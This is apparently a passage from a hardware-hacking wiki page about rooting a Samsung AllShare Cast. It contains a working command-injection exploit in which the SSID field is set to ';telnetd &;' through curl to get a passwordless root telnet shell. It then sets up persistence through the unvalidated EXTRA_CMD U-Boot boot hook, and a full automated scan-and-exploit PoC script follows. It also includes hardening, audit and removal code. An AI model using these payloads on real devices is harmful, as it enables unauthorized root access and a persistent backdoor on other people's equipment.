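# valid_ssid SSID: accept only 1..32 characters from a conservative
# whitelist (letters, digits, space, dot, underscore, dash). Real SSIDs may
# contain other bytes; widen the whitelist deliberately, never with quotes,
# '$', ';', '&', '|' or backticks.
valid_ssid() {
    [ -n "$1" ] && [ "${#1}" -le 32 ] || return 1
    [ -z "$(printf '%s' "$1" | tr -d 'A-Za-z0-9 ._-')" ]
}

# Hardened: validate first, then hand the SSID to wificmd as a single
# argument with no second parse. Even an accepted SSID cannot become a
# command this way.
configure_ap_hardened() {
    LOG=""
    if ! valid_ssid "$1"; then
        echo "rejected"
        return 1
    fi
    wificmd Save "SSID=$1" SECTYPE=NONE
    printf '%s\n' "$LOG"
}

echo "vulnerable, benign SSID:   $(configure_ap_vulnerable 'Home WiFi')"
echo "vulnerable, injected SSID: $(configure_ap_vulnerable '";reboot;"')"
echo "hardened, benign SSID:     $(configure_ap_hardened 'Home WiFi')"
echo "hardened, injected SSID:   $(configure_ap_hardened '";reboot;"' || :)"
```

With the injected SSID the vulnerable path logs a truncated wificmd call followed by REBOOT, which is the page's observation; the hardened path never reaches wificmd. The whitelist is the part to adapt: the real fix is the combination of validating length and character set and passing the value as one argument, not any particular list of allowed characters.<br />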
<br />
<br />
<br />
===Exploitation===<br />
<br />
We can exploit this form to spawn a telnet service by setting the <b>UEnvEXT_AP_SSID</b> parameter as <b>";telnetd &;"</b> as in the example below.<br />
<pre>curl -X POST -F 'UEnvEXT_AP_SSID=";telnetd &;"' -F 'UEnvEXT_AP_SECURITY=NONE' -F 'UEnvEXT_AP_KEY='\<br />
-F 'UEnvEXT_AP_ACTION=Save This External AP' http://192.168.49.100/cgi-bin/configure-external-ap.sh</pre><br />
<br />
<br />
After reconnecting to the device, a telnet service will be listening on TCP port 23; logging in as root requires no password, as the session below shows.<br />
<pre><br />
root@d2att:/data/local/tmp # ./busybox telnet 192.168.49.164 <br />
<br />
Entering character mode<br />
Escape character is '^]'.<br />
<br />
<br />
ATH-80:57:19:85:F2:28 login: root<br />
ATH-80:57:19:85:F2:28:/root # id<br />
uid=0(root) gid=0(root) groups=0(root),10(wheel)<br />
</pre><br />
<br />
===Persistence===<br />
Although the device has only one persistent partition, the script <b>/cavium/rc</b>, which runs at boot, reads the <b>EXTRA_CMD</b> firmware (U-Boot) environment variable and executes its contents as a command. Unlike the other environment variables <b>rc</b> consumes, this one is not filtered or validated at all.<br />
<br />
<br />
By modifying this environment variable, achieving a persistent root shell is trivial.<br />
<br />
<u>/cavium/rc | line 465</u><br />
<pre><br />
if [ "$EXTRA_CMD" != "" ] ; then<br />
echo "$EXTRA_CMD" >> extra_cmd<br />
chmod a+x extra_cmd<br />
cat extra_cmd >> $STATUS_FILE<br />
echo Running `cat extra_cmd` in the foreground.<br />
extra_cmd<br />
fi<br />
</pre><br />
<br />
<br />
This can be exploited by using <b>/cavium/fw_setenv EXTRA_CMD "telnetd &"</b><br />
<pre><br />
ATH-80:57:19:85:F2:28:/cavium # ./fw_setenv EXTRA_CMD "telnetd &"<br />
ATH-80:57:19:85:F2:28:/cavium # reboot<br />
root@d2att:/data/local/tmp # ./busybox telnet 192.168.49.164 <br />
<br />
Entering character mode<br />
Escape character is '^]'.<br />
<br />
<br />
ATH-80:57:19:85:F2:28 login: root<br />
ATH-80:57:19:85:F2:28:/root # <br />
</pre><br />
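Because the hook lives in the U-Boot environment rather than on the filesystem, the place to look for it (or for a backdoor someone else left) is a dump of that environment. The following is an added example, not part of this page: it parses fw_printenv-style KEY=VALUE output, reports whether <b>EXTRA_CMD</b> is set, and wraps the removal step given at the end of this page. The environment dump is constructed; apart from EXTRA_CMD, bootcmd, bootdelay and bootargs the names and values in it are made up, and the existence of a <b>/cavium/fw_printenv</b> beside fw_setenv is an assumption.<br />

```shell
#!/bin/sh
# Added example, not from the Exploitee.rs page: audit a U-Boot environment
# dump for the EXTRA_CMD hook that /cavium/rc executes at boot, and clear it.
# SAMPLE_ENV is constructed to look like fw_printenv output; only EXTRA_CMD,
# bootcmd, bootdelay and bootargs are names the page mentions, the rest
# (and every value except bootcmd's) are made up.
SAMPLE_ENV='bootdelay=5
bootcmd=run ${INTFPRG}; boots
bootargs=console=ttyS0,115200
EXTRA_CMD=telnetd &
ethaddr=80:57:19:85:F2:28'

# env_get DUMP NAME: print NAME's value from a KEY=VALUE dump. Only the first
# '=' separates key from value, so values containing '=' survive intact.
env_get() {
    printf '%s\n' "$1" | while IFS= read -r line; do
        case $line in
            "$2="*) printf '%s\n' "${line#*=}"; break ;;
        esac
    done
}

# audit_extra_cmd DUMP: succeed if EXTRA_CMD is unset or empty, otherwise
# print the hook and fail. /cavium/rc runs whatever this holds, so any value
# at all is worth looking at, not just 'telnetd'.
audit_extra_cmd() {
    hook=$(env_get "$1" EXTRA_CMD)
    if [ -z "$hook" ]; then
        echo "clean: EXTRA_CMD not set"
        return 0
    fi
    echo "boot hook present: EXTRA_CMD='$hook'"
    return 1
}

# clear_extra_cmd: the page's removal step. fw_setenv with a name and no
# value deletes the variable; this only does anything on the device itself,
# where /cavium/fw_setenv exists.
clear_extra_cmd() {
    if [ -x /cavium/fw_setenv ]; then
        /cavium/fw_setenv EXTRA_CMD && echo "EXTRA_CMD cleared, reboot to apply"
    else
        echo "not on the device: run '/cavium/fw_setenv EXTRA_CMD; reboot' there"
        return 1
    fi
}

# Live use on the device (assumes fw_printenv sits beside fw_setenv):
#   audit_extra_cmd "$(/cavium/fw_printenv)" || clear_extra_cmd
audit_extra_cmd "$SAMPLE_ENV" || echo "(expected for the constructed sample)"
```

The same env_get lookup works for any other variable rc reads, so it is also a quick way to confirm that bootdelay and bootcmd still hold the values you expect after experimenting at the U-Boot prompt.<br />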
<br />
===PoC===<br />
<br />
<iframe width="560" height="315" src="https://www.youtube.com/embed/7fCZu7DEAX8" frameborder="0" allowfullscreen></iframe><br />
<br />
<br />
<br />
The following PoC will automatically scan IPs to locate the AllShare Cast, exploit the CGI command injection to get a telnet shell, restart screen mirroring and automate a telnet session to gain persistent root.<br />
<pre><br />
#!/system/bin/sh<br />
# tested using a rooted Samsung Galaxy S 3<br />
# Make sure you have a busybox binary in the folder where you push this script<br />
# adb into your phone, or run from a terminal emulator<br />
# Establish a screen mirroring session with your AllShare Cast.<br />
# note: ensure your device's screen is not locked!<br />
#<br />
#> adb push allshare-autopwn.sh /data/local/tmp/<br />
#> adb push busybox /data/local/tmp<br />
#> adb shell<br />
#> su -c 'sh /data/local/tmp/allshare-autopwn.sh'<br />
<br />
cd /data/local/tmp<br />
TARGET=""<br />
host=100;<br />
# the AllShare Cast takes an address in 192.168.49.100-254 once mirroring is up<br />
while test $host -le 254;<br />
do<br />
    input keyevent 1    # harmless key event (KEYCODE_SOFT_LEFT) so the phone does not doze off mid-scan<br />
    echo "[*] trying 192.168.49.$host..."<br />
    if curl -s --connect-timeout 1 192.168.49.$host > /dev/null; then<br />
        echo "[+] found target: 192.168.49.$host!"<br />
        TARGET=192.168.49.$host<br />
        break<br />
    fi<br />
    host=$(($host+1))<br />
done<br />
<br />
if [ -n "$TARGET" ]; then<br />
    echo "[+] exploiting target!"<br />
    # command injection in the SSID field starts telnetd on the AllShare Cast<br />
    curl -X POST -F 'UEnvEXT_AP_SSID=";telnetd &;"' -F 'UEnvEXT_AP_SECURITY=NONE' -F 'UEnvEXT_AP_KEY=' -F 'UEnvEXT_AP_ACTION=Save This External AP' http://$TARGET/cgi-bin/configure-external-ap.sh > /dev/null<br />
    sleep 5<br />
    echo "[*] restarting mirror session"<br />
    input keyevent 4    # BACK, then reopen the Wi-Fi Display picker to reconnect<br />
    am start -n com.android.settings/.wfd.WfdPickerDialog<br />
    sleep 15<br />
    echo "[*] connecting to target"<br />
    input keyevent 4<br />
    input keyevent 4<br />
    echo "[*] automating telnet session..."<br />
    # log in as root (no password) and set the EXTRA_CMD boot hook so telnetd survives a reboot<br />
    PERSISTENCE="(sleep 5; echo \"root\"; sleep 5 ; echo \"fw_setenv EXTRA_CMD \\\"telnetd &\\\"; reboot\" ; sleep 5;) | ./busybox telnet $TARGET 23"<br />
    su -c "$PERSISTENCE"<br />
    echo "[+] done"<br />
    echo "[+] you can now telnet to port 23"<br />
fi<br />
</pre><br />
<br />
==Removing Root==<br />
<br />
To undo the persistence, delete the variable and reboot: run <b>/cavium/fw_setenv EXTRA_CMD; reboot</b> (fw_setenv with a name and no value removes that variable).</div>
0x00string